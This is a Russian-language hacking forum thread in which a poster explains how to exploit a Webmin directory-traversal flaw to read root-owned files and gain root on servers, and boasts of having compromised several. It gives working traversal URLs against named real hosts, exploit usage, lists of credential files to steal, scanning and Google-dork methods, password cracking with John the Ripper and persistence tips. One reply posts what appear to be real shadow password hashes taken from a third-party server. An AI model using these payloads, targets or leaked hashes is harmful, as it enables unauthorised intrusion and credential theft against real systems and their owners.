PDA

Просмотр полной версии : Использование уязвимости Webmin для получения максимальных привелегий.


Alexsize
20.04.2007, 15:58
Использование уязвимости Webmin для получения максимальных привелегий.


Здравствуй уважаемый ачатовец, да и гостю привет!

Сегодня я хочу рассказать вам про хороший способ получить рута в системе.

Хех скажите вы, слышали уже байки.. Мда. я тоже слышал, не спорю, хватает "способов получения рута".

Но я хочу рассказать о своем способе. Этим способом я порутал не очень много серверов (штук 8), но и этого оказалось достаточно.
Ведь серваки были не простые, а на фре. И крутилась на них порнуха, в промышленных масштабах.

Так что может кому этот способ и пригодиться=).
Далее буду краток..


Описание уязвимости

Сервис Webmin крутиться на 10000 порту по умолчанию.
Крутиться с правами суперпользователя.=)
Есть 2 режима работы протокола обмена этой системы удаленного администрирования с пользователем - http и https.
Cоответственно в сплоите предусмотрено 2 параметра для этих режимов. Рассмотрим его (сплоит) поподробнее.

Exploit (http://milw0rm.com/exploits/2017) - вот сам эксплоит, позволяющий добиться чтения файлов на уязвимой машине с правами Webmin.

Стоит так же добавить, что помимо использования сплоита можно добиться нужного эффекта и руками

https://solun.de:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd - вот пример ручной эксплуатации дыры


Использование

В случае с ручным использованием, я думаю, все ясно. НО ручной способ не всегда работает.

Рассмотрим использование сплоита.

Usage: webmin.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

Что мы тут имеем?

<url> - тут все, я думаю, понятно. Вводим URL или IP.
<port> - как я уже говорил, смело ставь 10000 порт. Его очень редко меняют.
<filename> - Вот тут вся соль. Сплоит позволяет читать файлы уязвимой машины с правами root. Неплохо. да?
<target> - как описано выше, Webmin работает в 2 режимах. Соответственно ставим 1 для https и 0 для http.

Собственно уже можно догадаться, что это сплоит позволяет нам очень многое, но я уточню для самых маленьких что именно=)

Ставим в параметр <filename> например такой файл /etc/shadow для Linux или /etc/master.passwd для FreeBSD и у нас сами знаете что..
Теперь примеры того что СТОИТ читать в первую очередь:

1. /etc/shadow, /etc/master.passwd
2. /root/.bash_history, /root/mysql_history, /root/.history, /home/user какой нить/.bash_history
3. Конфиги апача. Не буду делать BAYAN, читайте http://forum.antichat.ru/thread22832-httpd.conf.html.
4. Файлы конфигурации Webmin. Если вдмин не маньяк то могут лежать в двух разных местах

a) /usr/local/etc/webmin/miniserv.conf
/usr/local/etc/webmin/miniserv.users

б)/etc/webmin/miniserv.conf
/etc/webmin/miniserv.users

Если рут маньяк, то вам и рутовая читалка не поможет=).


Поиск уязвимых машин

Отдельно хочеться отметить такой вопрос, как поиск уязвимых машин.
Как вы уже наверно догадались, можно искать с поможью nmap.
Вот так: nmap -sT x.x.x.* -p 10000.
Но можно искать и с помощью Google.
Вот так inurl:"de:10000" Login to Webmin. Так что простор ниипаца какой.


Как получить рута.

Теперь методика получения рута.
Все просто.
Рекомендую заносить все найденные незашифрованный пароли в отдельный файл.
А после того как поиски закончены, запустить Ивана-потрошителя вот так: ./john-mmx shadow -wordlist=файл с найденными пассами.
Причем вместо shadow можно ставить master.passwd.
ВНИМАНИЕ
Найденный нами файл miniserv.users. Его конечно тоже на перебор. В нем пассы или DES или Unix md5. . Это как повезет.
Кстати иногда в нем можно встретить запись вроде root:0. Это значит что аутентификация идет по теневому файлу.
Еще хочу обратить внимание аудитории на то, что пароль root в miniserv.users НЕ ВСЕГДА совпадает с паролем root в shadow.
Так что перебирайте miniserv.users обязательно. Таким образом, даже если тебе и не удасться взять рута с ходу, можно получить права юзера и, при должном умении, залить веб-шелл.


Что дальше???

Теперь несколько пунктов о том "А что же делать дальше".
Если вы получили рута, то читайте кучу статей на ачате, например отличный вариант http://forum.antichat.ru/thread37187.html
Неплохо троянить Su, но не всегда катит.
Можно давать шелл системному юзеру. Тоже не всегда катит.
Иначе дела обстоят, если ты получил доступ в панель Webmin. Тут куча вариантов. Если есть возможность выполнения команды, то см. способы закрепления в системе. статей хватает.
Иногда таких прав нет. Тогда приходиться изворачиваться. Тут каждый сам себе трактор.


ЛОГИ Webmin

Как вы наверно уже догадались, ни один запрос к вебмину не проходит незамеченно.
Все строго логируеться.

Логи в Webmin, при неманьяковых админах храняться тут /var/log/webmin/

Их там несколько. Перечислять не буду,найдете все сами.
Про другие логи читайте например

http://forum.antichat.ru/thread26232-%F7%E8%F1%F2%EA%E0+%EB%EE%E3%EE%E2.html


З.Ы. Конструктивная критика будет учтена.
Если кому что не нравиться то сами АПСТЕНКУ=)
И самое главное, что этой уязвимостью файл приинклудить нельзя и команды системы из сплоита не выполняються


Greets to Kot777, Crilaz,X-treem, Elekt, ShadOS.

Slon
20.04.2007, 17:46
В принципе баян, уже 2 года это юзаю, но за старание плюс

Кстати, тема про locate.database не раскрыта, а это очень часто помогает во взломе через эту дыру

flipper
20.04.2007, 20:24
Небольшой скрипт (http://www.tjhunt.com/ftp/files/images/12.txt) для автоматизации процесса...

Alexsize
20.04.2007, 21:36
Slon, тема про базу locate не раскрыта специально, кому надо могут посмотреть видео

на милворме. Ссылку давать не буду. Там найти просто.

Slon
20.04.2007, 22:14
Alexsize, точно помню это видео :)
Хотя правиьно, каждый кто *никсом пользовался и так должен знать

x-treem
20.04.2007, 23:05
ах ты... salun.de работает то
бажная тачка)))

+toxa+
20.04.2007, 23:30
ммм... читалка с правами рута, не более... нафик спрашивается из этого статью делать...

p-range
21.04.2007, 00:04
Небольшой скрипт для автоматизации процесса...
линк битый =\

x-treem
21.04.2007, 09:28
хм, сказано же, руками не всегда катит.

flipper
21.04.2007, 10:13
Линк (http://www.tjhunt.com/ftp/files/images/12.txt) но пробудет он не долго...

x-treem
21.04.2007, 13:52
Линк (http://idi0ts.org/12.txt) пробудет он долго

Alexsize
23.04.2007, 08:16
Спасибо за линк, я думаю он многим пригодиться!

Alexsize
23.04.2007, 11:32
Хош верь хош нет, но иногда руками не катит а сплоитом катит=)

x-treem
23.04.2007, 17:34
ога, я с топикпастером эту дырку дрючили по полной. и реально, иногда не катит руками, а сплоетом катит.

kot777
25.04.2007, 17:45
Специально для умников даны два варианта, автомат и ручной...к чему уже приепываться то?

-=lebed=-
18.05.2007, 14:30
Специально для умников даны два варианта, автомат и ручной...к чему уже приепываться то?
угу, каждый сам решает...

moke
20.05.2007, 15:39
Не пашет нихрена..Пробывал руками и ногами, скрипт тоже не пашед на на http ни на https...
Наверное этот боян слишком зарос и ни у каво не осталось Webmin < 1.290 версии. :D
Походу как определить версию Webmin'а ? :rolleyes: Ы

Alexsize
22.05.2007, 12:15
Не пашет нихрена..Пробывал руками и ногами, скрипт тоже не пашед на на http ни на https...
Наверное этот боян слишком зарос и ни у каво не осталось Webmin < 1.290 версии. :D
Походу как определить версию Webmin'а ? :rolleyes: Ы


Солнышко, там при заходе на 10000 порт обычным броузером версия под полями для ввода подписана цифорками. Юзай пример из статьи. Искать надо уметь. Эстонцы, например, отлично подходили под дырочку эту=)

DanST
06.06.2007, 23:00
Люди обьясните как пользоваться
Я ваще полный чайник потомушоновичок)))

Validol
17.07.2007, 17:13
Опять ссылка умерла.

Xack-Zero
21.07.2007, 22:28
А ты посмотри на последнюю дату публикации топиков.

Ar3s
10.10.2007, 13:27
Даа. Статейка старовата по интернетовским меркам, да только бага до сих пор активна. Существует масса Одминов которые считают "если работает - не трогай". + бэкап - лучший поиск баги.
Поэтому и висят старые версии софта на серваках...

alexandros
16.12.2009, 02:22
Да нихера не работает,проверьте onguest.ru

diehard
16.12.2009, 02:45
Да нихера не работает,проверьте onguest.ru

может руки того - неоттуда выросли?
взял с серпа первый попавшийся - работает: https://quickprinter-web.de:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow

root:XgLCzX24JaZX2:14248:0:10000::::
clients:cdob7p2/DjFIY:13520:0:99999:7:::
cvs:!ylp6sw8ojYE2A:12382:0:99999:7:::
fa:wHlIPZQcxGgqg:13769:0:99999:7:::
sysroot:nnQTbhiCnJVRU:13497:0:99999:7:::
engel:O.dK0kGADaszE:14391:0:99999:7:::

alexandros
16.12.2009, 10:39
а ты глянь тут onguest.ru мож ты слеповат?
согласен,эта бага работает,тока как мне узнать где лежит каталог,я не знаю какая там ОС

alexandros
16.12.2009, 14:48
сори,это моя локалка,тока я не могу найти пусть с каталогами,на сервере стоит debian linux 1.3.0

ZaraZ
16.12.2009, 15:20
alexandros, ты бы еще тему 2002 года поднял